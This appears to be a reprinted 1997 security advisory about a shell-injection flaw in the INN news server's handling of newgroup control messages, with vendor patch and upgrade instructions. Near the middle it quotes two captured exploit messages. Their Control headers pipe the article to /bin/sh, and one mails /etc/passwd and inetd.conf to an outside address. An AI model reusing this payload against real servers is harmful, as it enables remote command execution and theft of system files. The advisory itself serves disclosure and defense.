COMMAND
InterNetNews server (innd)
SYSTEMS AFFECTED
Systems running InterNetNews server - up to v1.5 including that.
Systems using any of the listed vendors may be vulnerable.
Berkeley Software Design, Inc. (BSDI)
Caldera
Debian Linux
NEC Corporation
Netscape
Red Hat
NOTE: 1.5.1 could be vulnerable - see solutions
PROBLEM
The INN daemon (innd) processes "newgroup" and "rmgroup" control
messages in a shell script (parsecontrol) that uses the shell's
"eval" command. However, some of the information passed to eval
comes from the message without adequate checks for characters
that are special to the shell.
This permits anyone who can send messages to an INN server -
almost anyone with Usenet access - to execute arbitrary commands
on that server. These commands run with the uid and privileges of
the "innd" process on that server. Because such messages are
usually passed through Internet firewalls to a site's news
server, servers behind such firewalls are vulnerable to attack.
Also, the program executes these commands before checking whether
the sender is authorized to create or remove newsgroups, so
checks at that level (such as running pgpverify) do not prevent
this problem. Remote, unauthorized users can execute arbitrary
commands on the system with the same privileges as the innd (INN
daemon) process.
Joseph J. Snyder III send an example of exploit
Unparseable newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!gatech!EU.net!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderatedControl: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9220@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4
#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>
#-
Unsafe newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!sbcntrex!news.eecs.umich.edu!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4
#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-
SOLUTION
Upgrade to INN 1.5.1. Until you can do so, install the patches
available from James Brister or get help from your vendor, if it
is available.
If you do a 'make update' from a previous innd (eg innd1.4unoff4)
to upgrade to 1.5.1 you will still have your old parsecontrol
script. The exploit will still work. The temporary fix is to
copy over the new parsecontrol. The real fix is a newinstall of
1.5.1 with the conf files, lib's, etc pushed on top.
Examine your news logs for signs of exploitation. So far, we have
reports of at least six distinct message IDs being used:
830201540.9120@uunet.uu.net
830201540.9122@uunet.uu.net
830201540.9220@uunet.uu.net
830201540.9223@uunet.uu.net
830201540.9020@uunet.uu.net
830201540.9221@uunet.uu.net
Although these messages appear to come from UUNET, the messages
were forged.
It is recommend running 1.5.1, but if you're running a pre-1.5.1
version of INN, then please go look at web page:
http://www.isc.org/inn.html
or the ftp site
ftp://ftp.isc.org/isc/inn/patches
for patches to 1.4sec, 1.4unoff3, 1.4unoff4 and 1.5 to correct
this.
If you upgraded previously, you must apply new patch to protect
against the new vulnerability (see innd #4 on this page). Until
you can upgrade, you need to apply two patches (see below). You
If you do not upgrade to 1.5.1, apply a patch for the version you
are running and then apply the newly released patch that
addresses the second vulnerability discussed in this advisory. If
you are running INN 1.4sec2, you should upgrade to 1.5.1 as no
patches are available.
FIRST apply:
version patch
------- -----
1.5 ftp://ftp.isc.org/isc/inn/patches/security-patch.01
1.4sec ftp://ftp.isc.org/isc/inn/patches/security-patch.02
1.4unoff3, 1.4unoff4 ftp://ftp.isc.org/isc/inn/patches/security-patch.03
THEN apply (1.5.1, 1.5, 1.4sec, 1.4unoff3, 1.4unoff4)
ftp://ftp.isc.org:/isc/inn/patches/security-patch.04
Some additional patches:
Berkeley Software Design, Inc. (BSDI)
BSDI ship INN as part of our distribution. BSD/OS 2.1 includes INN
1.4sec and 2.1 users should apply the patch referenced here.
BSD/OS 3.0 includes INN 1.4unoff4 and the patch for that version
is already included so BSD/OS 3.0 is not vulnerable as
distributed.
An upgrade package for Caldera OpenLinux Base 1.0 will appear at
Caldera's site:
ftp://ftp.caldera.com/pub/col-1.0/updates/Helsinki/004/inn-1.5.1-2.i386.rpm
The current version of INN shipped with Debian is 1.4unoff4.
However the "unstable" (or development) tree contains inn-1.5.1.
It can be gotten from any debian mirror in the subdirectory
debian/unstable/binary/news
There is a critical security hole in INN which affects all
versions of Red Hat Linux. A new version, inn-1.5.1-6, is now
available for Red Hat Linux 4.0 and 4.1 for all platforms. If you
are running an earlier version of Red Hat, we strongly encourage
you to upgrade to 4.1 as soon as possible, as many critical
security fixes have been made. The new version of inn is PGP
signed with the Red Hat PGP key, which is available on all Red
Hat CDROMs, ftp.redhat.com, and public keyservers.
You may upgrade to the new version as follows:
Red Hat 4.1
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/sparc/inn-1.5.1-6.sparc.rpm
Red Hat 4.0
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/sparc/inn-1..5.1-6.sparc.rpm
NEC Corporation
Products below are shipped with INN mentioned here, so they are
vulnerable and patches are in progress.
Goah/NetworkSV R1.2 vulnerable
Goah/NetworkSV R2.2 vulnerable
Goah/NetworkSV R3.1 vulnerable
Goah/IntraSV R1.1 vulnerable
Netscape
The Netscape News Server 2.01 is immune to the attack outlined
here. The News Server 1.1 is, however, subject to the same
vulnerability as INN and Netscape has advised customers to
install the patch described in the advisory CERT (this one).
After installing any of the patches or updates, ensure that you
restart your INN server.